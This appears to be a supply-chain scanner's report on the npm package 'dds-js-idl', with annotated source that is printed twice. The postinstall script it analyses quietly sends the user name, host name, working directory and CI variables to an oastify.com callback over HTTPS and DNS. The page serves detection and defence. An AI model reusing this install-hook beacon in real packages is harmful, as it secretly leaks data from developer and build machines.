// npm package
dds-js-idl
Security research canary — NASA VDP
versions
2
maintainers
1
first publish
2026-05-23
publisher
l0bo
tarball
1,029 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-23
// exfil path
what is read → where it ships
steals
- ○ home dir
- ○ system info
sends to
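(no destination string extracted automatically — payload may be dynamic / obfuscated; note, however, that the excerpt below hard-codes its destination in `CALLBACK_HOST` and contacts it in plain sight over HTTPS and through a DNS lookup, so the empty field here reflects a gap in extraction, not the absence of a destination)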
evidence in excerpt
> const { execSync } = require('child_process');
> const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com';
> try { return execSync(cmd, { timeout: 3000 }).toString().trim(); }
> hostname: os.hostname(),
> https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {});
// publisher campaign
by l0bo
2 caught packages from this account
This is not an isolated catch. The same publisher has shipped 1 other package that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.
// offending code· @1.0.1· 1 file flagged
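llm: benign · 0.85 → No suspicious destination, no remote-exec shape — 1 other host(s).
Note: this model verdict conflicts with the static evidence on this page. The excerpt hard-codes a callback host, runs `whoami` through `child_process` at install time, and the version carries the `oast-callback-domain`, `child-process-spawn` and `osv-flagged:MAL-2026-4264` flags. Read the "benign" label as a classifier miss, not as clearance.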
- @1.0.1 · AUTO-PUBLISHED · publisher: l0bo · heuristic 75/100 · static flags 5 · llm benign (0.85) via ollama · install-scripts:postinstall · new-publisher:4d · suspicious-description:security-research · osv-flagged:MAL-2026-4264 · reads-env-vars · reads-homedir · reads-system-info · oast-callback-domain · child-process-spawn
→ No suspicious destination, no remote-exec shape — 1 other host(s).
// offending code · 1 file flagged · patterns: 5
--- install scripts ---
### postinstall
node postinstall.js
--- package/postinstall.js (excerpt) ---
// Analyst annotations (defensive reading of the flagged file).
// This script is wired to the npm `postinstall` lifecycle hook in the package.json
// shown further down, so it runs automatically whenever the package is installed
// with lifecycle scripts enabled. Installing with `--ignore-scripts` skips that hook,
// but package.json also names this same file as `main` and as the `bin` entry, so
// requiring the package or invoking its binary would execute the same code.
const https = require('https');
const os = require('os');
const { execSync } = require('child_process');
// Hard-coded destination; this page flags it as an OAST callback domain.
const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com';
// Runs `cmd` through a shell with a 3-second timeout and returns its trimmed output.
// Any failure is swallowed and reported as the literal string 'error', so a failing
// command never surfaces as an install error.
function get(cmd) {
  try {
    return execSync(cmd, { timeout: 3000 }).toString().trim();
  } catch {
    return 'error';
  }
}
// Host fingerprint collected at install time: current user name, host name, OS
// platform, the working directory of the install, and three environment variables
// that indicate a CI runner and the GitHub repository being built (empty string when
// unset). No os.homedir() call and no file reads are visible in this listing; the
// only path collected here is process.cwd().
const payload = {
  whoami: get('whoami'),
  hostname: os.hostname(),
  platform: os.platform(),
  cwd: process.cwd(),
  ci: process.env.CI || '',
  github: process.env.GITHUB_REPOSITORY || '',
  node_env: process.env.NODE_ENV || '',
};
// The fingerprint is serialized into the query string of a single request path.
const path = '/beacon?' + new URLSearchParams(payload).toString();
// Channel 1: HTTPS GET to the callback host. The response callback is empty and the
// 'error' handler discards failures, so nothing is printed during install. For
// detection, look for this host in proxy / egress logs from build and developer machines.
https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {});
// Channel 2: a DNS lookup whose left-most label is the collected user name. This puts
// the user name into a DNS query for the callback domain independently of the HTTPS
// request above — check resolver logs for subdomains of the callback host as well.
require('dns').lookup(`${payload.whoami}.${CALLBACK_HOST}`, () => {});
--- package.json (entry) ---
{
  "name": "dds-js-idl",
  "version": "1.0.1",
  "description": "Security research canary — NASA VDP",
  "scripts": { "postinstall": "node postinstall.js" },
  "main": "postinstall.js",
  "bin": { "dds-js-idl": "postinstall.js" }
}
--- postinstall.js (entry) ---
// Same content as the excerpt section above: install-time host fingerprint sent to a
// hard-coded callback host over HTTPS and via a DNS lookup, with all errors suppressed.
const https = require('https');
const os = require('os');
const { execSync } = require('child_process');
const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com';
// Shell command helper: 3-second timeout, returns 'error' instead of throwing.
function get(cmd) {
  try {
    return execSync(cmd, { timeout: 3000 }).toString().trim();
  } catch {
    return 'error';
  }
}
// Collected fields: user, host name, platform, working directory, CI-related env vars.
const payload = {
  whoami: get('whoami'),
  hostname: os.hostname(),
  platform: os.platform(),
  cwd: process.cwd(),
  ci: process.env.CI || '',
  github: process.env.GITHUB_REPOSITORY || '',
  node_env: process.env.NODE_ENV || '',
};
const path = '/beacon?' + new URLSearchParams(payload).toString();
// Outbound HTTPS request carrying the fields in its query string; errors are discarded.
https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {});
// DNS lookup with the user name as a subdomain label of the callback host.
require('dns').lookup(`${payload.whoami}.${CALLBACK_HOST}`, () => {});
